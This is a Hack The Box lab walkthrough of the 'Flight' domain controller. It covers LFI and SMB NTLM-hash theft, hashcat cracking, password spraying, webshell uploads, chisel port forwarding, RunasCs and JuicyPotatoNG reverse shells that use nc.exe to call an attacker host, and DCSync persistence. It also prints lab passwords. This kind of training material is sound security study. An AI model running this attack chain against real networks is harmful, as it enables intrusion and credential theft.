HTB Flight

9 min readMay 6, 2023


The machine is about stealing NTLM hashes via LFI, and SMB afterward theres also some common AD misconfig such as reusable password after you got the user flag you will need to enumerate further and do a user impersonation via runas which is a bit of challenge since theres no rdp or winrm / interactive shell to use. After you gain a shell as C.bum you will have a write access on the inetpub wherein we could use to drop a shell file and lastly for the privesc it would be an SEimpersonate privilege wherein you could use juicypotato to elevate and administrator

running nmap shows 12 ports open and it gives port 88,3268 and 53 which highly indicates that the machine is a domain controller

all ports

checking the web it doesnt have any interesting stuffs here and earlier at the nmap it shows flight.htb we could add it into our etc/hosts

doing some subdomain enumeration we got school

checking the page it has a ?view parameter which indicates it could be an lfi

fuzzing for windows lfi it was success. After trying to find some interesting files doesnt lead to anything.

since this is a domain controller we could steal some hashes via lfi. This could also work for sqli and xxe

after we got the hash lets use hashcat -m 5600 hash rockyou.txt to crack the ntlmv2

Password cracked: S@Ss!K@*t13

trying to winrm/rdp doesnt work same thing with psexec and wmiexec

running smbmap shows read only perms on the folder

since this is a DC I will check stuffs on bloodhound to gain a better understanding on how could we get the domain admin

checking for dcsync rights only the DC and admin have rights

while checking the domain users outbound object control i found this user I.francis actually i dont know also why i added it here it just made me laugh upon reading the description


after checking for a while nothing interesting from outbound object control or anything on the groups. The only interesting part here is webdevs group which has 1 user only, despite upon reading the description it has 2 potential users 1 as junior webdev and 1 for senior webdev aside from that if we get this user/group we could probably have a write permission to the web folder and use it to get a shell

another interesting user is L.kein which has a description of pentester there might be some juicy stuffs or remnants of the payloads we could use to escalate the privilege

next thing to consider is kerberoasting to get some hashes.

We could use impacket here or kerbrute but after doing that no luck with it. Since on the bloodhound theres no output for Find AS-REP Roastable Users (DontReqPreAuth) and the only kerberoastable acc is krbtgt

we could use rpcclient and then enumdomusers to create a user list

next is to do a crackmapexec to check on reused password and we got new user which is S.moon

crackmapexec smb -u users.txt -p ‘S@Ss!K@*t13’ — continue-on-success

running smbmap shows a write permission on shared, 1 attack we could do here is scf file attack to steal hashes

there are many ways to upload a file on smb we could use

sudo mount -t cifs ‘//flight.htb/Shared’ -o username=S.moon /tmp/1/testmnt

smbmap -H flight.htb -u S.moon -p ‘S@Ss!K@*t13’ — upload test.txt Shared\\testhello

smbclient then you use put <filename>

sudo mount -t cifs ‘//flight.htb/Shared’ -o username=S.moon /tmp/1/testmnt
smbmap -H flight.htb -u S.moon -p ‘S@Ss!K@*t13’ — upload test.txt Shared\\testhello

observing it for a while it shows that the file is being remove this highly indicates that we could abuse this to steal ntlm hash

trying to upload an scf doesnt work and i just realized that because of the extension, uploading files to the smb with a .scf doesnt work and it only accepts some extensions

trying to upload various file extensions .ini works

checking hacktricks .ini file could be use to steal ntlmv2 and after that we crack again the hash

again rdp and winrm doesnt work same with psexec and wmiexec

alternatively we can use smbclient ‘\\flight.htb\Users’ -U C.bum -p ‘Tikkycoll_431012284’ then we go to Desktop and get out user flag

checking for read write we got write permission on web folder

lets upload a php webshell to any of the folder. if we take a look it has index.php listed so a php webshell will work

smbmap -H flight.htb -u C.bum -p ‘Tikkycoll_431012284’ — upload cmd.php Web\\school.flight.htb\\cmd.php

next is to access the webshell and it seems like we are svc_apache checking for privs we dont have any good permission to escalate

next thing i tried is uploading msfvenom and get a meterpreter session we will be using this to check for exploit_suggester

After trying exploit suggester all of it doesnt work tried also some runas module but nothing works

next is to look for open ports and we can see that port 8000 is open which is interesting since on our nmap it doesnt show and despite its listening with its kinda odd might be some firewall or something

next thing to do is we portforward the port 8000 with chisel

on target machine .\chisel.exe client <attackerip>:<port> R:8000:

on attacker machine ./chisel server — reverse -p 9999

to check if its successful you can grep port 9999 and 8000 or access the port 8000

checking the website it shows a simple stuff but theres no functionalities in it

After enumerating where the landing page is we found it in inetpub/development. After that i check for write permission and we dont have

next idea was to do some user impersonation to C.bum since he is a senior webdev. We will be doing this via runas but after trying and looking around how we could do this in 1 line it seems like this wont work and we need an interactive shell in order to perform a runas some idea i could think of is create a script or exe file that uses runas command and use nc.exe to give us a shell or we could just find some tools online

after looking around we found

and trying whoami command works

checking for privs it seems like we cant use this user to privesc

checking the github we could get a shell with .\RunasCs.exe C.bum Tikkycoll_431012284 cmd.exe -r <ip>:<port>

checking for write permission it was success and checking on our portforwarded port it also reflects on the web

since it was in the inetpub this would be an aspnet/iis stuffs we could go to seclist and look for aspx webshell

checking for what user we are and priv we got iis and we also have SeImpersonatePrivilege where we could use for escalating our privileges

1 of the reason why i always check for whoami /priv is because some services or user/ service_users requires SeImpersonate to perform administrative level task such as configuring the system also some of it is default upon installation of a program or application

for example if we install GLPI and get a reverseshell theres a chance that we get shell as nt auth\network service

for mssql server application the shell we will be able to get is nt auth\mssql which has a high chance of having a seimpersonate

next thing to do is escalating the privilege. we can upload juicypotato and nc.exe or get a meterpreter session and use getsystem(the easiest way)

next is setup a listener and execute .\juicypotatong.exe -t * -p “C:\windows\System32\cmd.exe” -a “/c c:\xampp\htdocs\school.flight.htb\nc.exe <ip> <port> -e cmd”

after executing the juicypotato we receive shell as nt authority and we could now get the admin flag

1 last thing to do that is to perform a dcsync i know this is not needed on this box but its always good to have persistence on the machine and we could use passthehash here to always authenticate as the administrator

if you are going to do OFFSHORE prolabs having this thing in mind will help you finish the lab and setup your lateral movement easily

